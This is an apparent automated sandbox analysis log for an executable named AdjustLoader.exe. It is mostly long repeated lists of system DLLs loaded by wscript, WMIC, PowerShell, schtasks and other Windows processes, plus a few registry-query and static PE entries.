Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: AdjustLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: AdjustLoader.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: AdjustLoader.exe Static PE information: Virtual size of .text is bigger than: 0x100000
